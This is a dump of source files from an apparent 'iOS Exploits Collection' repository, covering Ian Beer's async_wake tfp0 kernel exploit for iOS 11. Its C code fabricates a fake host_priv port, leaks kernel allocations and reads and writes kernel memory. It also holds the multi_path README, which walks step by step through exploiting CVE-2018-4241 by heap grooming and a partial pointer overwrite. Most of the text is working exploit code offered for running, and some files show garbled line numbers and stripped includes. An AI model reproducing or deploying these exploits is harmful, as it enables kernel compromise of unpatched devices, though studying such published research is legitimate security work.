"idiom" : "ipad", 75 | "size" : "76x76", 76 | "scale" : "1x" 77 | }, 78 | { 79 | "idiom" : "ipad", 80 | "size" : "76x76", 81 | "scale" : "2x" 82 | }, 83 | { 84 | "idiom" : "ipad", 85 | "size" : "83.5x83.5", 86 | "scale" : "2x" 87 | }, 88 | { 89 | "idiom" : "ios-marketing", 90 | "size" : "1024x1024", 91 | "scale" : "1x" 92 | } 93 | ], 94 | "info" : { 95 | "version" : 1, 96 | "author" : "xcode" 97 | } 98 | } -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | 
UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/ViewController.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | @interface ViewController : UIViewController 4 | 5 | @property (weak, nonatomic) IBOutlet UILabel *tfp; 6 | 7 | @end 8 | 9 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/ViewController.m: -------------------------------------------------------------------------------- 1 | #import "ViewController.h" 2 | #include 3 | #include "async_wake.h" 4 | 5 | @interface ViewController () 6 | 7 | @end 8 | 9 | @implementation ViewController 10 | 11 | - (void)viewDidLoad { 12 | [super viewDidLoad]; 13 | // Do any additional setup after loading the view, typically from a nib. 14 | self.tfp.text = [NSString stringWithFormat:@"tfp: %x", go()]; 15 | } 16 | 17 | 18 | - (void)didReceiveMemoryWarning { 19 | printf("******* received memory warning! ***********\n"); 20 | [super didReceiveMemoryWarning]; 21 | // Dispose of any resources that can be recreated. 
22 | } 23 | 24 | 25 | @end 26 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/arm64_state.h: -------------------------------------------------------------------------------- 1 | #ifndef arm64_state_h 2 | #define arm64_state_h 3 | 4 | /* 5 | * GPR context 6 | */ 7 | 8 | struct arm_saved_state32 { 9 | uint32_t r[13]; /* General purpose register r0-r12 */ 10 | uint32_t sp; /* Stack pointer r13 */ 11 | uint32_t lr; /* Link register r14 */ 12 | uint32_t pc; /* Program counter r15 */ 13 | uint32_t cpsr; /* Current program status register */ 14 | uint32_t far; /* Virtual fault address */ 15 | uint32_t esr; /* Exception syndrome register */ 16 | uint32_t exception; /* Exception number */ 17 | }; 18 | typedef struct arm_saved_state32 arm_saved_state32_t; 19 | 20 | struct arm_saved_state32_tagged { 21 | uint32_t tag; 22 | struct arm_saved_state32 state; 23 | }; 24 | typedef struct arm_saved_state32_tagged arm_saved_state32_tagged_t; 25 | 26 | #define ARM_SAVED_STATE32_COUNT ((mach_msg_type_number_t) \ 27 | (sizeof (arm_saved_state32_t)/sizeof(unsigned int))) 28 | 29 | struct arm_saved_state64 { 30 | uint64_t x[29]; /* General purpose registers x0-x28 */ 31 | uint64_t fp; /* Frame pointer x29 */ 32 | uint64_t lr; /* Link register x30 */ 33 | uint64_t sp; /* Stack pointer x31 */ 34 | uint64_t pc; /* Program counter */ 35 | uint32_t cpsr; /* Current program status register */ 36 | uint32_t reserved; /* Reserved padding */ 37 | uint64_t far; /* Virtual fault address */ 38 | uint32_t esr; /* Exception syndrome register */ 39 | uint32_t exception; /* Exception number */ 40 | }; 41 | typedef struct arm_saved_state64 arm_saved_state64_t; 42 | 43 | #define ARM_SAVED_STATE64_COUNT ((mach_msg_type_number_t) \ 44 | (sizeof (arm_saved_state64_t)/sizeof(unsigned int))) 45 | 46 | struct arm_saved_state { 47 | arm_state_hdr_t ash; 48 | union { 49 | struct arm_saved_state32 
ss_32; 50 | struct arm_saved_state64 ss_64; 51 | } uss; 52 | } __attribute__((aligned(16))); 53 | #define ss_32 uss.ss_32 54 | #define ss_64 uss.ss_64 55 | 56 | typedef struct arm_saved_state arm_saved_state_t; 57 | 58 | /* 59 | * NEON context 60 | */ 61 | typedef __uint128_t uint128_t; 62 | typedef uint64_t uint64x2_t __attribute__((ext_vector_type(2))); 63 | typedef uint32_t uint32x4_t __attribute__((ext_vector_type(4))); 64 | 65 | struct arm_neon_saved_state32 { 66 | union { 67 | uint128_t q[16]; 68 | uint64_t d[32]; 69 | uint32_t s[32]; 70 | } v; 71 | uint32_t fpsr; 72 | uint32_t fpcr; 73 | }; 74 | typedef struct arm_neon_saved_state32 arm_neon_saved_state32_t; 75 | 76 | #define ARM_NEON_SAVED_STATE32_COUNT ((mach_msg_type_number_t) \ 77 | (sizeof (arm_neon_saved_state32_t)/sizeof(unsigned int))) 78 | 79 | struct arm_neon_saved_state64 { 80 | union { 81 | uint128_t q[32]; 82 | uint64x2_t d[32]; 83 | uint32x4_t s[32]; 84 | } v; 85 | uint32_t fpsr; 86 | uint32_t fpcr; 87 | }; 88 | typedef struct arm_neon_saved_state64 arm_neon_saved_state64_t; 89 | 90 | #define ARM_NEON_SAVED_STATE64_COUNT ((mach_msg_type_number_t) \ 91 | (sizeof (arm_neon_saved_state64_t)/sizeof(unsigned int))) 92 | 93 | struct arm_neon_saved_state { 94 | arm_state_hdr_t nsh; 95 | union { 96 | struct arm_neon_saved_state32 ns_32; 97 | struct arm_neon_saved_state64 ns_64; 98 | } uns; 99 | }; 100 | typedef struct arm_neon_saved_state arm_neon_saved_state_t; 101 | #define ns_32 uns.ns_32 102 | #define ns_64 uns.ns_64 103 | 104 | struct arm_context { 105 | struct arm_saved_state ss; 106 | struct arm_neon_saved_state ns; 107 | }; 108 | typedef struct arm_context arm_context_t; 109 | 110 | #define ARM_SAVED_STATE64 0x15 111 | 112 | #define ARM_DEBUG_STATE64 15 113 | const uint64_t ACT_DEBUGDATA_OFFSET = 0x438; 114 | 115 | struct arm64_debug_state 116 | { 117 | __uint64_t bvr[16]; 118 | __uint64_t bcr[16]; 119 | __uint64_t wvr[16]; 120 | __uint64_t wcr[16]; 121 | __uint64_t mdscr_el1; /* Bit 0 is SS 
(Hardware Single Step) */ 122 | }; 123 | 124 | struct arm_debug_aggregate_state { 125 | arm_state_hdr_t dsh; 126 | struct arm64_debug_state ds64; 127 | } __attribute__((aligned(16))); 128 | 129 | 130 | 131 | #endif 132 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/async_wake.h: -------------------------------------------------------------------------------- 1 | #ifndef async_wake_h 2 | #define async_wake_h 3 | 4 | #include 5 | mach_port_t go(void); 6 | 7 | #define CS_VALID 0x0000001 /* dynamically valid */ 8 | #define CS_ADHOC 0x0000002 /* ad hoc signed */ 9 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 10 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 11 | 12 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 13 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */ 14 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ 15 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 16 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */ 17 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */ 18 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000 19 | 20 | #define CS_ALLOWED_MACHO 0x00ffffe 21 | 22 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ 23 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ 24 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ 25 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ 26 | 27 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ 28 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ 29 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 30 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the 
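fact of path (osx only) */

#endif /* async_wake_h */

-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/com.apple.iokit.IOMobileGraphicsFamily.plist: --------------------------------------------------------------------------------
canvas_height
1136
canvas_width
640

-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/early_kalloc.c: --------------------------------------------------------------------------------
//
//  early_kalloc.c
//  async_wake_ios
//
//  Created by Ian Beer on 12/11/17.
//  Copyright © 2017 Ian Beer. All rights reserved.
//

#include "early_kalloc.h"

// NOTE(review): the angle-bracket targets of the system includes were lost in
// extraction; restored to the standard headers this file actually uses.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>

#include "find_port.h"
#include "kmem.h"
#include "symbols.h"

extern int message_size_for_kalloc_size(int kalloc_size);

/*
 * Get a kalloc allocation before we've got a kcall interface to just call it.
 *
 * Sends a message of the right size to a freshly allocated receive right, reads
 * the kernel address of the queued ipc_kmsg out of the port, then detaches the
 * kmsg from the port (ikmq_base = 0, msg_count/qlimit reset) so the kernel will
 * not free it behind our back. The receive right is deliberately kept alive on
 * success.
 *
 * size: requested kalloc size in bytes; message_size_for_kalloc_size() picks the
 *       user message size that maps onto it.
 *
 * Returns the kernel address of the ipc_kmsg buffer, or 0 if one of the
 * userland steps (port allocation, malloc, mach_msg send) failed. Requires the
 * kernel read/write primitives rk64/wk64/wk32 to already be working.
 */
uint64_t early_kalloc(int size) {
  mach_port_t port = MACH_PORT_NULL;
  kern_return_t err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
  if (err != KERN_SUCCESS) {
    printf("unable to allocate port\n");
    return 0;  // do not continue with MACH_PORT_NULL as the destination
  }

  uint64_t port_kaddr = find_port_address(port, MACH_MSG_TYPE_MAKE_SEND);

  struct simple_msg {
    mach_msg_header_t hdr;
    char buf[];  // C99 flexible array member instead of the GNU zero-length array
  };

  mach_msg_size_t msg_size = message_size_for_kalloc_size(size);
  struct simple_msg* msg = malloc(msg_size);
  if (msg == NULL) {
    printf("early kalloc failed to allocate message buffer\n");
    mach_port_destroy(mach_task_self(), port);
    return 0;
  }
  memset(msg, 0, msg_size);

  msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
  msg->hdr.msgh_size = msg_size;
  msg->hdr.msgh_remote_port = port;
  msg->hdr.msgh_local_port = MACH_PORT_NULL;
  msg->hdr.msgh_id = 0x41414142;

  err = mach_msg(&msg->hdr,
                 MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
                 msg_size,
                 0,
                 MACH_PORT_NULL,
                 MACH_MSG_TIMEOUT_NONE,
                 MACH_PORT_NULL);
  // the kernel holds its own copy of the message once mach_msg returns, so the
  // userland buffer is no longer needed whether or not the send succeeded
  free(msg);

  if (err != KERN_SUCCESS) {
    printf("early kalloc failed to send message\n");
    mach_port_destroy(mach_task_self(), port);  // nothing was queued, safe to drop the port
    return 0;
  }

  // find the message buffer: the port's queue head is the ipc_kmsg we just sent
  uint64_t message_buffer = rk64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE));
  printf("message buffer: %llx\n", message_buffer);

  // leak the message buffer: unlink it from the port so the kernel never frees it
  wk64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE), 0);
  wk32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT), 0x50000); // this is two uint16_ts, msg_count and qlimit

  return message_buffer;
}

-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/early_kalloc.h: --------------------------------------------------------------------------------
#ifndef early_kalloc_h
#define early_kalloc_h

#include <stdint.h>

uint64_t early_kalloc(int size);

#endif

-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/find_port.h: --------------------------------------------------------------------------------
#ifndef find_port_h
#define find_port_h

#include <mach/mach.h>

uint64_t find_port_address(mach_port_t port, int disposition);

#endif /* find_port_h */

-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/kcall.h: --------------------------------------------------------------------------------
#ifndef kcall_h
#define kcall_h

void kprintstr(char* msg);
void test_kcall(void);
//void kcall(uint64_t fptr, uint64_t arg0, uint64_t arg1);
uint64_t kcall(uint64_t fptr,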
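uint32_t argc, ...);
#endif

-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/kdbg.h: --------------------------------------------------------------------------------
#ifndef kdbg_h
#define kdbg_h

void test_kernel_bp(void);
uint64_t pin_current_thread(void);
void test_kdbg(void);
void test_fp(void);

#endif

-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/kmem.h: --------------------------------------------------------------------------------
#ifndef kmem_h
#define kmem_h

#include <mach/mach.h>

uint32_t rk32(uint64_t kaddr);
uint64_t rk64(uint64_t kaddr);

void wk32(uint64_t kaddr, uint32_t val);
void wk64(uint64_t kaddr, uint64_t val);

void wkbuffer(uint64_t kaddr, void* buffer, uint32_t length);
void rkbuffer(uint64_t kaddr, void* buffer, uint32_t length);

void kmemcpy(uint64_t dest, uint64_t src, uint32_t length);

void kmem_protect(uint64_t kaddr, uint32_t size, int prot);

uint64_t kmem_alloc(uint64_t size);
uint64_t kmem_alloc_wired(uint64_t size);
void kmem_free(uint64_t kaddr, uint64_t size);

void prepare_rk_via_kmem_read_port(mach_port_t port);
void prepare_rwk_via_tfp0(mach_port_t port);

// query whether kmem read or write is present
int have_kmem_read(void);
int have_kmem_write(void);

#endif

-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/kutils.c: --------------------------------------------------------------------------------
// NOTE(review): the angle-bracket targets of the system includes were lost in
// extraction; restored to the standard headers this file actually uses.
#include <stdio.h>
#include <stdint.h>

#include <mach/mach.h>

#include "kutils.h"
#include "kmem.h"
#include "find_port.h"
#include "symbols.h"

// io_bits values written into the fabricated port below (object active bit and
// kobject type); hoisted out of fake_host_priv so they are visible in one place
#define IKOT_HOST_PRIV 4
#define IO_ACTIVE 0x80000000

// kernel address of the ipc_port behind mach_task_self(); resolved once, then cached
uint64_t cached_task_self_addr = 0;

/*
 * Kernel address of our own task port, looked up via find_port_address on the
 * first call and cached in cached_task_self_addr afterwards.
 */
uint64_t task_self_addr(void) {
  if (cached_task_self_addr == 0) {
    cached_task_self_addr = find_port_address(mach_task_self(), MACH_MSG_TYPE_COPY_SEND);
    printf("task self: 0x%llx\n", cached_task_self_addr);
  }
  return cached_task_self_addr;
}

/*
 * Reads the ip_receiver field of our task port; the callers treat this value as
 * the kernel's ipc_space (a task port is owned by the kernel's space).
 */
uint64_t ipc_space_kernel(void) {
  return rk64(task_self_addr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER));
}

/*
 * Kernel thread object (ip_kobject) of the calling thread.
 * mach_thread_self() returns a new send right on every call, so the right is
 * released once the port address has been resolved instead of leaking one per call.
 */
uint64_t current_thread(void) {
  mach_port_t thread_self = mach_thread_self();
  uint64_t thread_port = find_port_address(thread_self, MACH_MSG_TYPE_COPY_SEND);
  mach_port_deallocate(mach_task_self(), thread_self);
  return rk64(thread_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
}

/*
 * Locate the kernel Mach-O header: read realhost out of the host port's
 * ip_kobject, round down to a page and walk downwards one page at a time until
 * the 64-bit Mach-O magic (0xfeedfacf) is found.
 * Returns 0 if no header is found within 0x10000 pages.
 */
uint64_t find_kernel_base(void) {
  mach_port_t host_self = mach_host_self();
  uint64_t hostport_addr = find_port_address(host_self, MACH_MSG_TYPE_COPY_SEND);
  mach_port_deallocate(mach_task_self(), host_self);  // mach_host_self() hands out a fresh right
  uint64_t realhost = rk64(hostport_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));

  uint64_t base = realhost & ~0xfffULL;
  // walk down to find the magic:
  for (int i = 0; i < 0x10000; i++) {
    if (rk32(base) == 0xfeedfacf) {
      return base;
    }
    base -= 0x1000;
  }
  return 0;
}

mach_port_t fake_host_priv_port = MACH_PORT_NULL;

/*
 * Build a fake host priv port: a receive right we own whose kernel ipc_port has
 * its io_bits, ip_receiver and ip_kobject rewritten to look like the real
 * host_priv port. The result is cached in fake_host_priv_port.
 * Returns the port, or MACH_PORT_NULL if allocating the port or inserting the
 * send right failed; no kernel memory has been modified in that case.
 */
mach_port_t fake_host_priv(void) {
  if (fake_host_priv_port != MACH_PORT_NULL) {
    return fake_host_priv_port;
  }
  // get the address of realhost:
  mach_port_t host_self = mach_host_self();
  uint64_t hostport_addr = find_port_address(host_self, MACH_MSG_TYPE_COPY_SEND);
  mach_port_deallocate(mach_task_self(), host_self);  // release the right mach_host_self() created
  uint64_t realhost = rk64(hostport_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));

  // allocate a port
  mach_port_t port = MACH_PORT_NULL;
  kern_return_t err;
  err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
  if (err != KERN_SUCCESS) {
    printf("failed to allocate port\n");
    return MACH_PORT_NULL;
  }

  // get a send right; bail before touching kernel memory if that fails,
  // otherwise we would patch a port we can never message
  err = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
  if (err != KERN_SUCCESS) {
    printf("failed to insert send right\n");
    mach_port_destroy(mach_task_self(), port);
    return MACH_PORT_NULL;
  }

  // locate the port
  uint64_t port_addr = find_port_address(port, MACH_MSG_TYPE_COPY_SEND);

  // change the type of the port
  wk32(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_ACTIVE|IKOT_HOST_PRIV);

  // change the space of the port
  wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), ipc_space_kernel());

  // set the kobject
  wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), realhost);

  fake_host_priv_port = port;

  return port;
}

-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/kutils.h: --------------------------------------------------------------------------------
#ifndef kutils_h
#define kutils_h

#include <mach/mach.h>

uint64_t task_self_addr(void);
uint64_t ipc_space_kernel(void);
uint64_t find_kernel_base(void);

uint64_t current_thread(void);

mach_port_t fake_host_priv(void);

#endif /* kutils_h */

-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/main.m: --------------------------------------------------------------------------------
#import <UIKit/UIKit.h>
#import "AppDelegate.h"

int main(int argc, char * argv[]) {
  @autoreleasepool {
    return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
  }
}

-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/symbols.h: --------------------------------------------------------------------------------
#ifndef symbols_h
#define symbols_h

#include <stdint.h>

enum kstruct_offset {
  /* struct task */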
KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 9 | KSTRUCT_OFFSET_TASK_REF_COUNT, 10 | KSTRUCT_OFFSET_TASK_ACTIVE, 11 | KSTRUCT_OFFSET_TASK_VM_MAP, 12 | KSTRUCT_OFFSET_TASK_NEXT, 13 | KSTRUCT_OFFSET_TASK_PREV, 14 | KSTRUCT_OFFSET_TASK_ITK_SPACE, 15 | KSTRUCT_OFFSET_TASK_BSD_INFO, 16 | 17 | /* struct ipc_port */ 18 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 19 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 20 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 21 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 22 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 23 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 24 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 25 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 26 | 27 | /* struct proc */ 28 | KSTRUCT_OFFSET_PROC_PID, 29 | 30 | /* struct ipc_space */ 31 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE, 32 | 33 | /* struct thread */ 34 | KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR, 35 | KSTRUCT_OFFSET_THREAD_LAST_PROCESSOR, 36 | KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR, 37 | KSTRUCT_OFFSET_THREAD_CONTEXT_DATA, // thread.machine.contextData 38 | KSTRUCT_OFFSET_THREAD_UPCB, // thread.machine.upcb 39 | KSTRUCT_OFFSET_THREAD_UNEON, // thread.machine.uNeon 40 | KSTRUCT_OFFSET_THREAD_KSTACKPTR, 41 | 42 | /* struct processor */ 43 | KSTRUCT_OFFSET_PROCESSOR_CPU_ID, 44 | 45 | /* struct cpu_data */ 46 | KSTRUCT_OFFSET_CPU_DATA_EXCEPSTACKPTR, // despite the name this actually points to the top of the stack, not the bottom 47 | KSTRUCT_OFFSET_CPU_DATA_CPU_PROCESSOR, 48 | }; 49 | 50 | 51 | 52 | // the 53 | 54 | enum ksymbol { 55 | KSYMBOL_OSARRAY_GET_META_CLASS, 56 | KSYMBOL_IOUSERCLIENT_GET_META_CLASS, 57 | KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX, 58 | KSYMBOL_CSBLOB_GET_CD_HASH, 59 | KSYMBOL_KALLOC_EXTERNAL, 60 | KSYMBOL_KFREE, 61 | KSYMBOL_RET, 62 | KSYMBOL_OSSERIALIZER_SERIALIZE, 63 | KSYMBOL_KPRINTF, 64 | KSYMBOL_UUID_COPY, 65 | KSYMBOL_CPU_DATA_ENTRIES, 66 | KSYMBOL_VALID_LINK_REGISTER, 67 | KSYMBOL_X21_JOP_GADGET, 68 | KSYMBOL_EXCEPTION_RETURN, 69 | KSYMBOL_THREAD_EXCEPTION_RETURN, 70 | KSYMBOL_SET_MDSCR_EL1_GADGET, 71 | 
KSYMBOL_WRITE_SYSCALL_ENTRYPOINT, 72 | KSYMBOL_EL1_HW_BP_INFINITE_LOOP, 73 | KSYMBOL_SLEH_SYNC_EPILOG 74 | }; 75 | 76 | int koffset(enum kstruct_offset); 77 | 78 | uint64_t ksym(enum ksymbol); 79 | 80 | void offsets_init(void); 81 | void symbols_init(void); 82 | int probably_have_correct_symbols(void); 83 | 84 | #endif 85 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/README.md: -------------------------------------------------------------------------------- 1 | ### multi_path - exploit for p0 issue 1558 (CVE-2018-4241) 2 | @i41nbeer 3 | 4 | mptcp_usr_connectx is the handler for the connectx syscall for the AP_MULTIPATH socket family. 5 | 6 | The logic of this function fails to correctly handle source and destination sockaddrs which aren't 7 | AF_INET or AF_INET6: 8 | 9 | ``` 10 | // verify sa_len for AF_INET: 11 | 12 | if (dst->sa_family == AF_INET && 13 | dst->sa_len != sizeof(mpte->__mpte_dst_v4)) { 14 | mptcplog((LOG_ERR, "%s IPv4 dst len %u\n", __func__, dst->sa_len), MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR); 15 | error = EINVAL; 16 | goto out; 17 | } 18 | 19 | // verify sa_len for AF_INET6: 20 | 21 | if (dst->sa_family == AF_INET6 && 22 | dst->sa_len != sizeof(mpte->__mpte_dst_v6)) { 23 | mptcplog((LOG_ERR, "%s IPv6 dst len %u\n", __func__, dst->sa_len), MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR); 24 | error = EINVAL; 25 | goto out; 26 | } 27 | 28 | // code doesn't bail if sa_family was neither AF_INET nor AF_INET6 29 | 30 | if (!(mpte->mpte_flags & MPTE_SVCTYPE_CHECKED)) { 31 | if (mptcp_entitlement_check(mp_so) < 0) { 32 | error = EPERM; 33 | goto out; 34 | } 35 | 36 | mpte->mpte_flags |= MPTE_SVCTYPE_CHECKED; 37 | } 38 | 39 | // memcpy with sa_len up to 255: 40 | 41 | if ((mp_so->so_state & (SS_ISCONNECTED|SS_ISCONNECTING)) == 0) { 42 | memcpy(&mpte->mpte_dst, dst, dst->sa_len); 43 | } 44 | 45 | ``` 46 | 47 | Looking around in the structure which you overflow inside you 
notice you can hit both fields here: 48 | 49 | if (mpte->mpte_itfinfo_size > MPTE_ITFINFO_SIZE) 50 | _FREE(mpte->mpte_itfinfo, M_TEMP); 51 | 52 | mpte_itfinfo_size is just before mpte_itfinfo. 53 | 54 | When the structure is initialized the mpte_itfinfo pointer points to a small inline array. If more subflows are added 55 | than will fit in there they are instead put in a heap buffer, and mpte_itfinfo will point to that. 56 | 57 | If you had another bug (eg the kernel heap disclosure bug from async_wake) you could overwrite the mpte_itfinfo field 58 | with any valid zone object and it would get free'd (in fact, you could also overwrite it with an offset into that object 59 | for even more fun!) 60 | 61 | However, we don't have that. 62 | 63 | Instead another approach is to partially overwrite the pointer. If we partially overwrite it with NULL bytes we can point 64 | it to a 256 byte, 65k, 16MB or 4GB aligned value. 65 | 66 | In this exploit I choose a 3 byte NULL overwrite, which will cause a kfree of the mpte_itfinfo address rounded down to the 67 | next 16MB boundary. 68 | 69 | The exploitation flow is as follows: 70 | 71 | Allocate alternatingly 16MB of ipc_kmsgs followed by a bunch of mptcp sockets. The goal here is to get a kalloc.2048 allocation 72 | at that 16MB boundary. 73 | 74 | Use the bug to free one of the ipc_kmsgs, moving that page to the intermediate list and putting the 16MB-aligned allocation on a 75 | kalloc.2048 intermediate page freelist. 76 | 77 | Allocate a bunch of filled 2047 byte pipes; the backing buffers for these pipes will come from kalloc.2048, hopefully including our 78 | 16MB-aligned address. 79 | 80 | Trigger the bug a second time, freeing the same address and this time then allocate a bunch of preallocated ipc_kmsg buffers from 81 | kalloc.2048. 82 | 83 | Now we hopefully have an ipc_kmsg (which we can get messages sent to and then receive) and a pipe buffer (which we can read and write) 84 | overlapping each other. 
85 | 86 | I use the thread exception port trick from extra_recipe to get messages sent to the preallocated ipc_kmsg buffer. Each time we check each 87 | of the pipes to see if any of them contain the message. When we find the right (ipc_kmsg,pipe) pair we can rewrite the message to send ourselves 88 | a fake port which lives inside the pipe buffer. I structure that fake port like the one from async_wake (which I based on yalu 10.2 by 89 | @qwertyoruiopz and @marcograss) to give me an early kernel read primitive. 90 | 91 | Using the kernel read primitive I find the kernel task and make a fake port which allows easier kernel memory read/write via 92 | mach_vm_read/mach_vm_write. 93 | 94 | Caveat: To connect mptcp sockets you do need the com.apple.developer.networking.multipath entitlement which requires an apple developer cert, which 95 | anyone can buy from Apple. 96 | 97 | Reliability: 98 | This is a security research tool and is faaaar from perfect. However, it should work most of the time, and when it does work it should 99 | do a good job of cleaning up so it won't panic later. 100 | 101 | To improve the probability of it working: 102 | * turn off wifi and go into airplane mode 103 | * reboot 104 | * wait 30 seconds after restarting 105 | * run the app from xcode 106 | 107 | Supported devices: 108 | It should work on iOS 11.0 - 11.3.1 inclusive. I have tested on: iPod Touch 6g, iPhone 6s, iPhone SE, iPhone 7, iPhone 8 109 | 110 | API: 111 | #include "sploit.h" and call go() to run the exploit. 
